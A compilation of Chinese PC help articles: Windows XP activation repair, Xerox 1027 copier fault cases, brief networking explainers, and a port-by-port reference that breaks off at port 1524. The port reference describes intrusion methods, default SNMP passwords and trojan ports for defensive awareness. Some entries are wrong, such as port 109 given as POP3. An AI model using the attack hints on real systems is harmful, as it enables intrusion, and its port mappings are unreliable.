前几日，我的WindowsXP发生问题，导致系统误认为我的硬件系统发生变化，导致我的WindowsXP需要重新激活，并且锁定了我的正常登陆模式，并且提示你的WindowsXP需要重新激活，可事实上我的硬件系统没有发生任何变化，并没有添加/删除任何硬件设备，也没有更新BIOS/固件，可是WindowsXP还是认为我的WindowsXP需要重新激活，没有办法，我找上面提到的方法在win98下（我的机子装有3个系统，分别是Win98/2000/XP）把WPA.DBL文件还原到原位置并且覆盖了源文件，重新启动到WindowsXP以后发现系统果然已经激活了，一阵喜悦之情马上溢于言表。但是当我想看看系统属性的时候，发现提示有一个用于提供系统属性信息的服务没有启动，我马上到控制面板/管理工具/服务里面察看是否没有启动，经过检查，发行服务并非系统提示中说的那样没有启动，而是正在正常的运行。随后我在命令窗口模式中输入systeminfo，结果遭到拒绝。我感到很奇怪，于是到系统日志中察看，最终发现硬件数据库被毁坏了。结果导致不能使用系统信息工具。而且那个硬件设备数据库我没有备份，我想这可遭了。虽然系统基本上没有问题，但是不知道系统的稳定性如何，因为硬件数据库的被破坏的后果最终会导致系统不认识我的硬件设备/错误的认识。还好我前一天在系统完全正常的情况下（也无需激活）使用了系统还原工具做了一个备份，于是我启动系统还原工具，结果发现我的系统还原备份点全部被删除了！后果当然是不能使用系统还原功能。

这么办？重新安装？不！我想到了还有之后一招：是用修复WindowsXP的功能。说起这个修复WindwsXP，这可是一个很好用的方法：修复就相当于Windows98的覆盖安装一样，不但可以保留所有软件，而且还可以保留所有的设置，是一个修复系统的很好的方法。

因为使用上比较复杂，所以我画了使用流程图如下：

使用WindowsXP启动以后
----------------------
|
|
F6-->安装额外的SCSI/RAID驱动
|
|
F2-->使用Windows Automated System Recovery Disk(ASR)修复系统（最佳选择，不过事先要制作ASR软盘）
|
|
安装WindowsXP 按ENTER键
故障控制台修复WindowsXP 按R键-------〉会启动故障控制台（适用于高级用户）
放弃安装 按F3
|
|
<按ENTER键>
|
|
同意安装协议
|
|
自动搜索老版本的Windows(不能搜索NTFS文件系统)
|
|
搜索完成以后会提示搜索到的Windows，不会有Win98，移动光标到要修复的Windows操作系统上
|
|
修复安装WindowsXP 按R键--------〉会自动启动安装界面并且开始安装，耗时和全新安装差不多，安装结束前会要求填入CD-KEY，全部结束以后就可以启动到WindowsXP下了，并且已经安装的软件和个人信息不会丢失，但是还是有些问题（见后面）
全新安装 按F8键-------〉会按照全新安装模式安装系统。

我选择了修复安装WindowsXP以后，系统开始安装了，经过漫长的45钟以后，安装结束，登录进WindowsXP以后，发现果然可以使用系统信息了，而且硬件设备数据库也修复了，系统仍然处于无需激活状态，但是接着发现好像还是有些问题没有解决：
1.以前安装的所有补丁全部丢失，需要重新安装。
2.显卡驱动程序被更换成WindowsXP自带的，想必是我的显卡驱动没有数字签名。
3.Intel应用程序加速器软件丢失，需要重新安装。
4.systeminfo不能够全部反映出整个系统的信息。以前能够显示的启动了多少时间的，修复后不能够显示，以前能够显示的已经安装了多少个补丁修复以后只能够显示几个（即使全部补丁安装完毕也是这样）。

虽然我的系统已经修复，但是没解决的问题仍然存在，如果大家知道解决方法（就是问题4的解决方法），请来信告知。

修复注意事项：
1.必须使用上次安装的CD，不然即使修复成功也不能够登录。
2.要求立即激活的系统修复以后仍然要求立即激活。
3.关于锁定：这里有些误解会认为磁盘被锁定了，数据会丢失了，这些全是谎话，真实的情况是不能够登录到正常模式下，但是安全模式下仍然可以使用，而且磁盘也没有问题。也可以使用DOS操作或故障控制台的操作，如果安装有其他的操作系统，也可以操作。
4.关于被锁定以后硬盘损坏：这个完全是有人恶意造谣的问题。
5.关于逻辑炸弹：所谓的逻辑炸弹就是在一定条件下发生作用的一个程序，比如KV的江民炸弹。但是请大家注意：在一定条件下发生作用的程序不一定是逻辑炸弹，比如共享软件的试用期和WindowsXP的试用期等等。这些程序在没有注册/激活的情况下都有一定的条件限制，但是一旦经过注册/激活以后，这个条件限制就自动解除了。并不存在WindowsXP超过使用期限没有激活就会导致硬盘损坏的谣言。
6.关于激活：没有激活前可以使用30天，如果已经激活，但是硬件改变量超过5件，仍然需要重新激活（硬件改变量指有改变的硬件设备。注意有的硬件改变以后，其改变量会被认作是2或更高，如网络设备）。安装虚拟光驱软件也会被认作是硬件发生改变，升级BIOS/固件，修改IDE设备的主从关系也会被认作系统硬件发生改变，这里需要大家格外注意。
7.正版用户的激活限制：一般来说是5次，但是只要你超过5次以后打免费电话到微软（中国）激活中心说明情况以后，他们会把数据库的记录清零，也就是说没有激活次数的限制。

OK!如果大家还有什么疑问可以来信和我谈论。本文到此结束。


施乐XEROX 1027复印机故障维修六例

《一键清理系统垃圾》

施乐XEROX 1027复印机故障维修六例

    例一，故障现象：机器停止工作并显示“L8”状态码。
    故障分析：“L8”状态码的含义是稿台玻璃温度过高，即稿台玻璃热敏电阻检测到稿台玻璃温度高于50℃。从故障现象看，测温器件是好的，应重点检查稿台玻璃温度控制电路和光学冷却风扇组件及其相关电路。
    故障排除：提醒用户和维修人员，有一点值得注意，就是当“L8”出现时机器停止工作，但光学冷却风扇仍运转，使光学系统冷却，直到“L8”消除，不要采用关机冷却的方法，这样等待时间较长。
    当“L8”状态码出现时，机器停止了工作，但光学冷却风扇不运转，因此可初步判定是光学冷却风扇及其有关电路有问题。输入诊断代码10－1对光学冷却风扇进行测试，结果光学冷却风扇仍不运转；按“停止/清除”键，取消功能代码1，用万用表测P57－10与P57－3两端电压为100V AC，则说明光学冷却风扇100V AC供电正常；再输入功能代码1并按复印键，用万用表测P4－14电压时为＋24V DC（正常应为0V DC），这说明主控制板有问题，因此应检查主控制板上接口电路U6（8255）、U38（74LS04）及U41（7406N）。在诊断/非诊断状态下，用逻辑笔分别测试U38的13脚，其电平有高低变化，而12脚无任何变化，说明U38损坏。更换U38后故障排除。
    例二，故障现象：纸张卡在输纸传送带上，同时机器显示“E3－3”状态码。
    故障分析：造成该故障现象一般有三种可能性，一是传送皮带老化松弛，在运转过程中传送皮带不动或时停时动，应检查传送带运转是否正常；二是真空风扇不转或常处于低速运转（真空风扇是一直流电机，在复印过程中以高速运转，在待机状态下以低速运转，也可设定为中速运转，这是由主控制板所控制的），应检查真空风扇组件及相关电路；三是抽真空气流通道阻塞，应检查臭氧过滤器及真空风扇罩是否严重漏气。
    故障排除：根据上述分析，首先开机，发现真空风扇不转，输入诊断代码10－2并按复印键，真空风扇仍不转，在此诊断状态下，用万用表测P4－13电压为＋24V DC（此时应为0V DC），说明主控制板有问题。在诊断/与非诊断状态下，用逻辑笔分别对主控制板的U41（7406N）5脚进行测试并有高低电平变化，当对6脚测试时，发现该脚始终为低电平，因此可判定U41损坏。更换U41后故障排除。如果当手头没有7406N这种芯片时，也可用74LS06代换。
    另外，对XEROX1027维修手册中关于真空风扇和回缩电磁铁所使用的直流工作电压作以修正，真空风扇使用的是低压电源的＋24V DC开关，而不是＋24V DC；回缩电磁铁使用的是低压电源的＋24V DC，而不是＋24V DC开关。
    例三，故障现象：复印品前端有2mm～3mm的黑条。
    故障分析：这种故障现象是较为常见的，造成该故障现象发生的主要原因有两个，一是原稿定位指示灯电路板下面所粘贴的白色塑料片被完全污染，应检查清洁；二是像间/像边缘消电灯及其电路有问题。
    故障排除：首先打开稿台玻璃，对原稿定位指示灯电路板下面的塑料片进行清洁，故障现象仍然存在。然后输入诊断代码9－2，打开前门，用手头的工具接通联锁开关并按复印键，发现像间/像边缘消电灯中间段不亮，在此诊断状态下，用万用表测P3－33～37各端电压均为0V DC，属正常，因此问题很可能出在像间/像边缘消电灯电路板上，该电路板装在硒鼓组件上的蓝色塑料把手内，经检查是该电路板上的厚膜电路损坏，更换该电路板后，故障排除。
    例四，故障现象：开机无任何动作和显示即死机。
    故障分析：造成死机现象的原因很多，但无外乎两种可能性。一是低压电源故障或其它电路短路而造成低压电源自动保护，正常情况下，开机后CR4、CR5常亮，即说明低压电源输出的＋24V DC和＋5V DC正常，否则CR4、CR5将保持熄灭状态；二是主控制板自诊电路故障或微处理器工作不正常，这部分电路主要由U1（D7810CW微处理器）、U2、U3（在先前生产的机器中，U2、U3是27128，后期生产的机器中仅由一片27256代替）、U4（8417RAM）、U5（74LS373）、U12（74LS139）、U13（74LS74）、U15（RST519）、U17（74LS32）、U18（74LS11）、U19（74LS08）、U20（74HC00）、U34（74HC14）、U36（74HC14）、HY2厚膜电路、永久记忆电池及其它分立元器件组成，该部分的任一集成电路或厚膜电路损坏均可造成自检失效，产生死机现象。正常情况下，CR2开机后一闪即灭，即说明微处理器、EPROM、RAM及自诊逻辑电路正常，＋5V DC电源和＋24V DC电源正常，同时则产生一个整机复位信号，否则CR2开机后将常亮，因此对该部分的电路应进行全面检查。
    故障排除：打开机器后盖，开机观察CR4、CR5、CR2三个发光二极管，可能会出现两种结果。一个是CR4、CR5常亮，这说明低压电源输出的＋24V DC和＋5V DC电压正常，CR2在开机瞬间一闪即灭而后常亮，则说明自诊电路有问题；另一个是开机后，CR4、CR5均不亮，这说明低压电源输出有问题。下面就分别浅述不同情况下的故障排除方法：
    一、开机后CR4、CR5常亮，CR2开机瞬间一闪即灭，自诊电路有问题。为了快速确定是微处理器的问题还是其外围电路的问题，首先对U18的第6脚进行检测，正常时该脚为低电平，如果该脚为高电平，在确保U20、U17良好的前提下，可以判定是微处理器工作不正常或损坏。那么对U18的6脚进行检测，结果该脚为低电平，则说明微处理器的外围电路有问题。然后再对U19的第11脚进行检测，结果该脚为低电平，正常时应为脉冲信号，测12脚为脉冲信号，属正常，那么13脚肯定应为低电平，经测试果然如此；测U39的3脚为高电平，说明U39是好的；测U12的5脚为高电平，正常应为脉冲信号，而1、2、3脚的三个输入信号为脉冲信号，属正常，这说明U12的5脚输出有问题，可以判定是U12损坏。更换U12（74LS139）后开机，机器恢复了正常工作。
    二、开机后，CR4、CR5均不亮，低压电源无输出。首先应进行检查分析，划分出故障范围，否则将无从下手。复印机与其它机器有所不同，除电路板多外，连线多、连线长、分支多，另外，出现故障时整个机器无动作、无显示，不能提供任何状态信息，因此，只有划分出故障范围，才能对故障进行有效的分割和定位，最终找出故障点。那么如何正确判断故障范围呢?其方法是：拔掉主控制板上除低压电源供电外的所有插头，开机观察主控制板上的两个绿色发光二极管是否点亮。若点亮，则说明低压电源有故障，也可能是机器电路中存在短路点，否则，可能是低压电源有故障，也可能是主控制板有故障，还应作进一步的检查、判断。断开低压电源对主控制板的供电，开机对低压电源进行检测，若无输出，则说明低压电源有故障，否则说明主控制板上电源对地有短路点。关于主控制板上电源对地短路是不多见的，但也有可能，比如C7或C25击穿等，因此，主控制板上电源对地短路故障在此就不冗述了。下面就低压电源故障和机器电路中存在短路点作一浅述。
    1.低压电源故障
    该电源是一精密开关电源，根据多年的维修实践，低压电源故障一般是CR5（C93－02）整流块或Q2（C3261）开关管击穿损坏，两者的故障现象是相同的，即电源保护无输出，更换损坏件后故障排除。值得注意的是这种故障一般都是人为所造成，比如机械传动被卡死后而造成＋24V DC短路，因此还应彻底排除机械故障或电路中的短路点。
    2.机器电路中存在短路点
    除给主控制板供电外，把主控制板上及其它部位可插拔的低压插接件全部断开，开机后主控制板上的CR4、CR5点亮，说明低压电源和主控制板工作正常。关机，首先恢复操作面板接口插接件P/J2，开机面板有显示，然后逐个接通其它插接件，每接通一个开机一次，观察面板是否有所显示，当接通P/J46插接头开机时面板无显示，则可断定短路点就在与P/J46相关的连线及部件上，经检查发现短路点在像间/像边缘消电灯控制板上，排除短路点后，机器恢复正常工作。
    例五，故障现象：复印品浅淡并有底灰。
    故障分析：复印品浅淡并有底灰是一种常见故障，一般与光学系统、充电、显影有关，但影响最大的还是载体失效。载体经长期使用，表面涂层磨损，其粘结性、电荷控制能力减弱，磁力下降，与感光鼓配合不良，因此，应重点检查载体。
    故障排除：首先对光路进行了清洁并更换了充电电极丝，故障现象依旧，然后取出显影器观察，发现载体已失效。更换载体后，故障排除。注意：1.更换载体前，一定要把失效载体清除干净，否则新载体的寿命将达不到三万张或更短；2.色粉只能使用施乐系列的色粉，否则会影响载体的寿命，还可能出现负像及其它复印品质量问题。
    例六，故障现象：100％复印时，复印品图像纵向拉长且发虚。
    故障分析：根据施乐1027复印机工作原理，硒鼓的转速是恒定的，即主电机的转速是恒定的，图像的纵向放大/缩小是由灯架扫描速度来改变的，也就是通过改变灯架电机转速来实现的。两种电机使用的电源均为＋24V DC开关，其转动方向和运转速度是通过主电路板及各自电路板进行控制的。对电机而言，施加于其绕组的电压高，则运行速度高，反之则运行速度低。那么，针对该故障现象进行分析，有两种可能性，或是灯架电机运行速度低于规定值，或是主电机运行速度高于规定值，因此，应对灯架电机、主电机组件及相关电路进行全面检查。下面就分两种情况分别浅述故障排除方法。
    故障排除：1.灯架电机运行速度低于规定值。根据故障现象初步判断，灯架电机电路板工作良好，问题很可能在主电路板上。灯架电机的运行是由主电路板上发出的信号控制的，主电路板输出四个控制信号至灯架电机电路板：1灯架电机工作＋5V DC时钟脉冲，P3－20；2灯架扫描（H）＋5V DC，灯架回程（L）＋5V DC，P3－26；3灯架电机驱动（L）＋5V DC，P3－25；4速度控制脉冲，P3－18。其中，灯架电机工作＋5V DC时钟脉冲是灯架电机电路板的基准时钟信号，如果没有这个信号，灯架在任何工作方式下，都会因移动过慢而造成复印品图像被拉长现象，因此，应首先对该信号进行检测。在机器处于工作状态的同时，用逻辑笔测试P3－20，结果该端为高电平，正常应为＋5V DC脉冲，这说明主电路板的U30的14脚输出有问题，同样，在机器处于工作状态的同时，对U30的6脚进行检测，结果为脉冲信号，属正常，这就说明U30这个芯片有问题，更换该芯片（74LS244）后，故障排除。
    2.主电机运行速度高于规定值。主电机是该机的主要驱动单元，所承担驱动的部件多，常处于较重负荷工作状态中。而主电机电路板的驱动元件主要是功放三极管和大功率二极管，在运行中，一直处于大电流的冲击和大电流工作状态，故损坏率较高，其损坏特点是短路，因此应重点检查主电机电路板的驱动部分。主电机正向运转时，其电流流向为：＋24V DC→Q8→D7→P16－4→主电机→P16－5→D8→Q11→R55→GND，顺着这条线仔细检查，当检查到Q11时，其E－C间短路，已失去了电压控制能力。更换Q11（D1608）后，故障排除。D1608是达林顿管（其参数是：P：50W　I：8A　U：80V），市场上不易买到，可用其它参数相同或接近的功率管进行代替。


什么时信使服务

《一键清理系统垃圾》

什么时信使服务

在Windows XP中，“信使服务”在服务列表中名称为“Messenger”，该服务用来传输客户端和服务器之间的Net Send和Alerter（报警器）服务消息。默认情况下，“信使服务”是打开的，所以当你的电脑连接到Internet上时，一些网站（包括厂商网站）可以通过该服务发送一些信息，在目标用户的计算机上会弹出一个名为“信使服务”的对话框。
    关闭方法：单击Windows“开始”菜单，单击“运行”。在“打开”框中，键入“net stop messenger”。单击“确定”按钮。
    命令“net stop messenger”的作用是停止“信使服务”，要启用“信使服务”，请使用“net start messenger”命令。


什么是 DirectX

《一键清理系统垃圾》

什么是 DirectX

    在 Windows 操作系统的体系构架中，在内核与硬件之间有一层抽象层，专门对硬件进行屏蔽抽象，所以用户不再被允许对硬件进行直接访问。这样做以后，大大地提高了操作系统的抗破坏性和抗干扰性，但这样以来，使硬件操作的效率大打折扣，许多新硬件的新特性无法直接使用，这对多媒体和游戏的发展显然是一种障碍。DirectX 是微软公司提供的一套优秀的应用程序编程接口(APIs)，用于联系应用程序和硬件自身，它对发展 Windows 平台下的多媒体应用程序和电脑游戏起到了关键的作用。DirectX 组件包括：DirectDraw、DirectSound、DirectPlay、Direct3D、DirectInput、DirectSetup、AutoPlay 等。
    总之，DirectX 的主要好处有两个：为软件开发者提供与硬件的无关性；为硬件开发提供策略。


什么是host表

《一键清理系统垃圾》

什么是host表

hosts文件是Windows系统中一个负责IP地址与域名快递解析的文件，以ASCLL格式保存。计算机在键入域名（比如www.baidu.com）的时候，首先会去看看hosts文件汇总有没有关于此域名IP地址的记录。如果有，就直接登陆该网站；如果没有再查询DNS服务器。hosts在Windows98中是hosts.sam文件，在Windows2000/XP中则就是hosts文件，没有拓展名。


什么是POP3

《一键清理系统垃圾》

什么是POP3

    POP 即为 Post Office Protocol 的简称，是一种电子邮局传输协议，而 POP3 是它的第三个版本，是规定了怎样将个人计算机连接到 Internet 的邮件服务器和下载电子邮件的电子协议。它是 Internet 电子邮件的第一个离线协议标准。简单点说，POP3 就是一个简单而实用的邮件信息传输协议。

什么是 SMTP?
    SMTP 的全称是“Simple Mail Transfer Protocol”，即简单邮件传输协议。它是一组用于从源地址到目的地址传输邮件的规范，通过它来控制邮件的中转方式。SMTP 协议属于 TCP/IP 协议簇，它帮助每台计算机在发送或中转信件时找到下一个目的地。SMTP 服务器就是遵循 SMTP 协议的发送邮件服务器。


什么是Smartdrv程序

《一键清理系统垃圾》

什么是Smartdrv程序

    Smartdrv.exe这个文件主要作用是为磁盘文件读写增加高速缓存。内存的读写速度比磁盘高得多，如果将内存作为磁盘读写的高速缓存可以有效提高系统运行效率。Smartdrv.exe这个文件在Windows各个版本的安装光盘中或是硬盘上的Windows/command/里都有，只有几十KB，把这个文件复制到软盘下，启动系统后直接运行这个程序(可以不加参数，该程序会自动根据内存大小分配适当的内存空间作为高速缓存)，再安装Windows XP即可。另外提醒大家，这个程序在安装完Windows后，不要运行，否则Windows可用内存将减少。


丢包

《一键清理系统垃圾》

丢包

数据在INTERNET上的传输方式数据在INTERNET上是以数据包为单位传输的，每包nK，不多也不少。这就是说，不管你的网有多好，你的数据都不会是以线性（就象打电话一样）传输的，中间总是有空洞的。数据包的传输，不可能百分之百的能够完成，因为种种原因，总会有一定的损失。碰到这种情况，INTERNET会自动的让双方的电脑根据协议来补包。如果你的线路好，速度快，包的损失会非常小，补包的工作也相对较易完成，因此可以近似的将你的数据看做是无损传输。但是，如果你的线路较差（如用猫），数据的损失量就会非常大，补包工作也不可能百分之百完成。在这种情况下，数据的传输就会出现空洞，造成丢包。


端口概念

《一键清理系统垃圾》

端口概念

    在网络技术中，端口（Port）大致有两种意思：一是物理意义上的端口，比如，ADSL Modem、集线器、交换机、路由器用于连接其他网络设备的接口，如RJ-45端口、SC端口等等。二是逻辑意义上的端口，一般是指TCP/IP协议中的端口，端口号的范围从0到65535，比如用于浏览网页服务的80端口，用于FTP服务的21端口等等。我们这里将要介绍的就是逻辑意义上的端口。

查看端口
    在Windows 2000/XP/Server 2003中要查看端口，可以使用Netstat命令：
    依次点击“开始→运行”，键入“cmd”并回车，打开命令提示符窗口。在命令提示符状态下键入“netstat -a -n”，按下回车键后就可以看到以数字形式显示的TCP和UDP连接的端口号及状态。

关闭/开启端口
    在介绍各种端口的作用前，这里先介绍一下在Windows中如何关闭/打开端口，因为默认的情况下，有很多不安全的或没有什么用的端口是开启的，比如Telnet服务的23端口、FTP服务的21端口、SMTP服务的25端口、RPC服务的135端口等等。为了保证系统的安全性，我们可以通过下面的方法来关闭/开启端口。

关闭端口
    比如在Windows 2000/XP中关闭SMTP服务的25端口，可以这样做：首先打开“控制面板”，双击“管理工具”，再双击“服务”。接着在打开的服务窗口中找到并双击“Simple Mail Transfer Protocol （SMTP）”服务，单击“停止”按钮来停止该服务，然后在“启动类型”中选择“已禁用”，最后单击“确定”按钮即可。这样，关闭了SMTP服务就相当于关闭了对应的端口。

开启端口
    如果要开启该端口只要先在“启动类型”选择“自动”，单击“确定”按钮，再打开该服务，在“服务状态”中单击“启动”按钮即可启用该端口，最后，单击“确定”按钮即可。
提示：在Windows 98中没有“服务”选项，你可以使用防火墙的规则设置功能来关闭/开启端口。
端口分类

逻辑意义上的端口有多种分类标准，下面将介绍两种常见的分类：

1. 按端口号分布划分

（1）知名端口（Well-Known Ports）
    知名端口即众所周知的端口号，范围从0到1023，这些端口号一般固定分配给一些服务。比如21端口分配给FTP服务，25端口分配给SMTP（简单邮件传输协议）服务，80端口分配给HTTP服务，135端口分配给RPC（远程过程调用）服务等等。

（2）动态端口（Dynamic Ports）
    动态端口的范围从1024到65535，这些端口号一般不固定分配给某个服务，也就是说许多服务都可以使用这些端口。只要运行的程序向系统提出访问网络的申请，那么系统就可以从这些端口号中分配一个供该程序使用。比如1024端口就是分配给第一个向系统发出申请的程序。在关闭程序进程后，就会释放所占用的端口号。
    不过，动态端口也常常被病毒木马程序所利用，如冰河默认连接端口是7626、WAY 2.4是8011、Netspy 3.0是7306、YAI病毒是1024等等。

2. 按协议类型划分
    按协议类型划分，可以分为TCP、UDP、IP和ICMP（Internet控制消息协议）等端口。下面主要介绍TCP和UDP端口：

（1）TCP端口
    TCP端口，即传输控制协议端口，需要在客户端和服务器之间建立连接，这样可以提供可靠的数据传输。常见的包括FTP服务的21端口，Telnet服务的23端口，SMTP服务的25端口，以及HTTP服务的80端口等等。

（2）UDP端口
    UDP端口，即用户数据包协议端口，无需在客户端和服务器之间建立连接，安全性得不到保障。常见的有DNS服务的53端口，SNMP（简单网络管理协议）服务的161端口，QQ使用的8000和4000端口等等。
常见网络端口

网络基础知识!端口对照

端口：0
服务：Reserved
说明：通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描，使用IP地址为0.0.0.0，设置ACK位并在以太网层广播。

端口：1
服务：tcpmux
说明：这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者，默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户，如：IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。

端口：7
服务：Echo
说明：能看到许多人搜索Fraggle放大器时，发送到X.X.X.0和X.X.X.255的信息。

端口：19
服务：Character Generator
说明：这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者为了回应这些数据而过载。

端口：21
服务：FTP
说明：FTP服务器所开放的端口，用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。

端口：22
服务：Ssh
说明：PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点，如果配置成特定的模式，许多使用RSAREF库的版本就会有不少的漏洞存在。

端口：23
服务：Telnet
说明：远程登录，入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术，入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。

端口：25
服务：SMTP
说明：SMTP服务器所开放的端口，用于发送邮件。入侵者寻找SMTP服务器是为了传递他们的SPAM。入侵者的帐户被关闭，他们需要连接到高带宽的E-MAIL服务器上，将简单的信息传递到不同的地址。木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口。

端口：31
服务：MSG Authentication
说明：木马Master Paradise、Hackers Paradise开放此端口。

端口：42
服务：WINS Replication
说明：WINS复制

端口：53
服务：Domain Name Server（DNS）
说明：DNS服务器所开放的端口，入侵者可能是试图进行区域传递（TCP），欺骗DNS（UDP）或隐藏其他的通信。因此防火墙常常过滤或记录此端口。

端口：67
服务：Bootstrap Protocol Server
说明：通过DSL和Cable modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址。HACKER常进入它们，分配一个地址把自己作为局部路由器而发起大量中间人（man-in-middle）攻击。客户端向68端口广播请求配置，服务器向67端口广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。

端口：69
服务：Trival File Transfer
说明：许多服务器与bootp一起提供这项服务，便于从系统下载启动代码。但是它们常常由于错误配置而使入侵者能从系统中窃取任何 文件。它们也可用于系统写入文件。

端口：79
服务：Finger Server
说明：入侵者用于获得用户信息，查询操作系统，探测已知的缓冲区溢出错误，回应从自己机器到其他机器Finger扫描。

端口：80
服务：HTTP
说明：用于网页浏览。木马Executor开放此端口。

端口：99
服务：Metagram Relay
说明：后门程序ncx99开放此端口。

端口：102
服务：Message transfer agent(MTA)-X.400 over TCP/IP
说明：消息传输代理。

端口：109
服务：Post Office Protocol -Version3
说明：POP3服务器开放此端口，用于接收邮件，客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交 换缓冲区溢出的弱点至少有20个，这意味着入侵者可以在真正登陆前进入系统。成功登陆后还有其他缓冲区溢出错误。

端口：110
服务：SUN公司的RPC服务所有端口
说明：常见RPC服务有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等

端口：113
服务：Authentication Service
说明：这是一个许多计算机上运行的协议，用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多计算机的信息。但是它可作为许多服务的记录器，尤其是FTP、POP、IMAP、SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务，将会看到许多这个端口的连接请求。记住，如果阻断这个端口客户端会感觉到在防火墙另一边与E-MAIL服务器的缓慢连接。许多防火墙支持TCP连接的阻断过程中发回RST。这将会停止缓慢的连接。

端口：119
服务：Network News Transfer Protocol
说明：NEWS新闻组传输协议，承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器。多数ISP限制，只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子，访问被限制的新闻组服务器，匿名发帖或发送SPAM。

端口：135
服务：Location Service
说明：Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和RPC的服务利用计算机上的end-point mapper注册它们的位置。远端客户连接到计算机时，它们查找end-point mapper找到服务的位置。HACKER扫描计算机的这个端口是为了找到这个计算机上运行Exchange Server吗？什么版本？还有些DOS攻击直接针对这个端口。

端口：137、138、139
服务：NETBIOS Name Service
说明：其中137、138是UDP端口，当通过网上邻居传输文件时用这个端口。而139端口：通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于windows文件和打印机共享和SAMBA。还有WINS Regisrtation也用它。

端口：143
服务：Interim Mail Access Protocol v2
说明：和POP3的安全问题一样，许多IMAP服务器存在有缓冲区溢出漏洞。记住：一种LINUX蠕虫（admv0rm）会通过这个端口繁殖，因此许多这个端口的扫描来自不知情的已经被感染的用户。当REDHAT在他们的LINUX发布版本中默认允许IMAP后，这些漏洞变的很流行。这一端口还被用于IMAP2，但并不流行。

端口：161
服务：SNMP
说明：SNMP允许远程管理设备。所有配置和运行信息的储存在数据库中，通过SNMP可获得这些信息。许多管理员的错误配置将被暴露在Internet。Cackers将试图使用默认的密码public、private访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向用户的网络。

端口：177
服务：X Display Manager Control Protocol
说明：许多入侵者通过它访问X-windows操作台，它同时需要打开6000端口。

端口：389
服务：LDAP、ILS
说明：轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。

端口：443
服务：Https
说明：网页浏览端口，能提供加密和通过安全端口传输的另一种HTTP。

端口：456
服务：[NULL]
说明：木马HACKERS PARADISE开放此端口。

端口：513
服务：Login,remote login
说明：是从使用cable modem或DSL登陆到子网中的UNIX计算机发出的广播。这些人为入侵者进入他们的系统提供了信息。

端口：544
服务：[NULL]
说明：kerberos kshell

端口：548
服务：Macintosh,File Services(AFP/IP)
说明：Macintosh,文件服务。

端口：553
服务：CORBA IIOP （UDP）
说明：使用cable modem、DSL或VLAN将会看到这个端口的广播。CORBA是一种面向对象的RPC系统。入侵者可以利用这些信息进入系统。

端口：555
服务：DSF
说明：木马PhAse1.0、Stealth Spy、IniKiller开放此端口。

端口：568
服务：Membership DPA
说明：成员资格 DPA。

端口：569
服务：Membership MSN
说明：成员资格 MSN。

端口：635
服务：mountd
说明：Linux的mountd Bug。这是扫描的一个流行BUG。大多数对这个端口的扫描是基于UDP的，但是基于TCP的mountd有所增加（mountd同时运行于两个端口）。记住mountd可运行于任何端口（到底是哪个端口，需要在端口111做portmap查询），只是Linux默认端口是635，就像NFS通常运行于2049端口。

端口：636
服务：LDAP
说明：SSL（Secure Sockets layer）

端口：666
服务：Doom Id Software
说明：木马Attack FTP、Satanz Backdoor开放此端口

端口：993
服务：IMAP
说明：SSL（Secure Sockets layer）

端口：1001、1011
服务：[NULL]
说明：木马Silencer、WebEx开放1001端口。木马Doly Trojan开放1011端口。

端口：1024
服务：Reserved
说明：它是动态端口的开始，许多程序并不在乎用哪个端口连接网络，它们请求系统为它们分配下一个闲置端口。基于这一点分配从端口1024开始。这就是说第一个向系统发出请求的会分配到1024端口。你可以重启机器，打开Telnet，再打开一个窗口运行natstat -a 将会看到Telnet被分配1024端口。还有SQL session也用此端口和5000端口。

端口：1025、1033
服务：1025：network blackjack 1033：[NULL]
说明：木马netspy开放这2个端口。

端口：1080
服务：SOCKS
说明：这一协议以通道方式穿过防火墙，允许防火墙后面的人通过一个IP地址访问INTERNET。理论上它应该只允许内部的通信向外到达INTERNET。但是由于错误的配置，它会允许位于防火墙外部的攻击穿过防火墙。WinGate常会发生这种错误，在加入IRC聊天室时常会看到这种情况。

端口：1170
服务：[NULL]
说明：木马Streaming Audio Trojan、Psyber Stream Server、Voice开放此端口。

端口：1234、1243、6711、6776
服务：[NULL]
说明：木马SubSeven2.0、Ultors Trojan开放1234、6776端口。木马SubSeven1.0/1.9开放1243、6711、6776端口。

端口：1245
服务：[NULL]
说明：木马Vodoo开放此端口。

端口：1433
服务：SQL
说明：Microsoft的SQL服务开放的端口。

端口：1492
服务：stone-design-1
说明：木马FTP99CMP开放此端口。

端口：1500
服务：RPC client fixed port session queries
说明：RPC客户固定端口会话查询

端口：1503
服务：NetMeeting T.120
说明：NetMeeting T.120

端口：1524
服务：ingress
